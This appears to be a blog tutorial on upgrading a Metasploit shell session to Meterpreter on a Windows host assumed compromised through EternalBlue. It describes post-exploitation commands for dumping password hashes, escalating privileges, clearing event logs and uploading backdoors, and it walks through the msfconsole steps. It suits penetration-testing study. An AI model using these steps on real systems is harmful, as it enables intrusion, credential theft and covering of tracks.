brown metal shield
Thu May 11

Metasploit: Upgrade Shell to Meterpreter

In another article, we have talked a lot about Metasploit and how it can be used to seize the target system. However, in some cases, you may also need to upgrade it to Meterpeter so you can reap the benefit from it.

What is Meterpreter?

Put simply, Meterpreter is an advanced payload that lets the user interact with it quite similarly with how the user interacts with the shell. Though, there are some specific commands that are not available in shell that can give you a tremendous advantage over the exploited system. This is one of the reasons why upgrading the shell to Meterpreter could be beneficial.

The Meterpreter commands

There are lots of useful commands that can be used for assisting you during the exploitation process. Most of them are derived from the stdapi extension which you can access from the help command. However, some commands are only available once you get access to the system. For the reason that different system privileges work differently (e.g. Linux vs Windows), some of the commands listed below may only be available in one operating system and not the other.

Identifier command

getuid : the UID is a unique identifier assigned to a user by the operating system to determine permission and privilege associated with that specific user. For example, in the Windows machine, this command will let you determine what level of access you are currently in on the compromised system (e.g. Server username: NT AUTHORITY\SYSTEM).

getpid : the command lets you identify in what process the current meterpreter payload is running, by stating its process ID. It can be an indication whether a migration is successful or not.

ps : stands for “process list”, the command lets you list all running programs on the target system. By identifying the process ID (PID), the attacker can determine which process will be the target of action such as “kill” or “migrate”, to manipulate the process on the system.

Privilege escalation command

getsystem : can help you to try various ways to elevate your privilege. It is very useful if you only have limited access to the target server. If this command is successful, you will be rewarded with full administration access, allowing you to perform any action you want.

hashdump : a very powerful command for dumping the contents of the SAM (Security Account Manager) database. It stores the user information and also contains users’ password allowing users to authenticate both locally or remotely. If you are able to obtain the hash, it will require you to crack it first in order to get the clear text password.

clearev : the command is responsible to wipe your tracks in the target system. Will be very useful to obscure your trace and activity.

migrate : when an attacker gains access to a system through a vulnerable application, they typically start with a low-privilege user account. However, the attacker needs to escalate their privileges to access sensitive data and critical system resources. One way to achieve this is by migrating the Meterpreter payload to a process running with higher privileges. By using this command, you can migrate the Meterpreter payload with the system-level process, to let you employ more advanced attack and detection.

File manipulation

download : as you can expect, this command lets you download files from the target system into yours. The downloaded file will then be stored in your current directory shown by getlwd command or specified destination path.

upload : lets you upload files from your system to the target system. This can be useful for you, to go further on your attack by uploading additional tools or malware or even establishing a persistence attack by installing a backdoor on the target system.

There is still a whole lot more the Meterpreter has to offer like detecting all connected devices within the same network using arp command by allowing the attacker to view the IP-to-MAC address mapping stored in the cache or some basic Linux terminal options. Most importantly, it may be suitable for your specific needs based on the particular occasion you are currently in.

Upgrading shell to Meterpreter

Meterpreter also provides a wide range of post-exploitation capabilities, including the ability to execute commands, capture keystrokes, steal credentials, and pivot to other systems on the network, making it a valuable tool for advanced penetration testing and other security assessments. Therefore, upgrading from a basic shell to Meterpreter can significantly enhance the attacker’s ability to gather information, escalate privileges, and maintain persistence on the target system.

Here is the step by step tutorial of how you can upgrade shell to Meterpreter.

Set current shell session to background

For the explanation purpose, let’s assume that you have successfully gained access with the EternalBlue exploit to a Windows system. You should see an interactive Powershell like this.

C:\Windows\System32>

This interactive shell should be sent to the background first before proceeding to the next step. Hence, we need to use the Ctrl-z key for this, and answer with y.

Searching for shell to Meterpreter module

Now you will be brought back to the msfconsole and you can go back with the following command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > back


msf6 >

You can then search for the module to upgrade the current shell to Meterpreter.

msf6 > search shell_to_meterpreter

Supposedly, it returns with only one result, and you can choose it with its name or index by utilizing the use command

msf6> use 0


msf6 post(multi/manage/shell_to_meterpreter) >

Configuring options

As usual, we need to set the options for the module. You can do that with the show options command or simply options.

msf6 post(multi/manage/shell_to_meterpreter) > options

This module requires the SESSION option to be set. We do have the shell running in the background. This SESSION needs to be set on the session where the shell belongs to. To see the active sessions, you can use the sessions -l command.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

At the far left, you can see the shell session ID. In our case, the ID is 1, so we set the Meterpreter session with this ID.

msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1

Wait for a while until a new Meterpreter session is created. If done correctly you should have another session like this.

msf6 post(multi/manage/shell_to_meterpreter) >

If you check the sessions list once again, you should see a new Meterpreter session on the list with several information alongside it.


 1  shell x64/windows
 2   meterpreter x64/windows

Switch to Meterpreter session

We have successfully upgraded the shell to Meterpreter. To access the Meterpreter we need to switch to the corresponding session with the following command.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 2

Then it will be switched to the Meterpreter.

meterpreter >

Also, you can run the help command, to see all available commands we have mentioned earlier.

Conclusion

Meterpreter is a total game-changer when it comes to hacking with the Metasploit framework. It’s got all sorts of post-exploitation abilities that allow you to dig deep into the target system and do all kinds of stuff that basic shells just can’t. For example, you can use Meterpreter to gather all sorts of juicy info about the system and the network it’s on, like who’s using it, what software is installed, and which ports are open and active. You can even use it to gain admin privileges by exploiting weak points in the system.

In addition to these capabilities, Meterpreter also offers a number of built- in modules that can be used to perform specific tasks, such as capturing screenshots or sniffing network traffic based on its built-in sniffer extension which makes it a versatile tool that can be adapted to a wide range of scenarios and objectives.